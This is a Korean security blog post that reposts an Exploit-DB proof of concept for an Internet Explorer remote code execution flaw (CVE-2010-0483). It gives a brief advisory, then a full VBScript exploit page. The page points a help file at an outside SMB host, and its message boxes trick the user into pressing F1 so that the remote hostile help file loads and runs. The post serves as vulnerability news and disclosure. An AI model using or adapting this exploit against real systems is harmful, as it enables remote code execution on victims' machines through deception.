본문 바로가기
취약점소식

[MS]Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability POC

by 잡다한 처리 2010. 3. 3.
반응형



VBScript를 이용한 원격 코드 실행 취약점(CVE-2010-0483) 에 대한 POC가 공개 되었다.


# Title: Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability 
# EDB-ID: 11615 
# CVE-ID: () 
# OSVDB-ID: () 
# Author: Maurycy Prodeus 
# Published: 2010-03-02 
# Verified: yes 
# Download Exploit Code
# Download N/A

view sourceprint?
Microsoft Internet Explorer is prone to a remote code execution vulnerability.
 
Source (iSEC Security Research):
http://isec.pl/vulnerabilities10.html
 
Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.
 
Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.
 
Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.
 
===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================
 
<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
  
//For i=1 to 2500
//  big = big & "\..\"
//Next
  
  
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>




댓글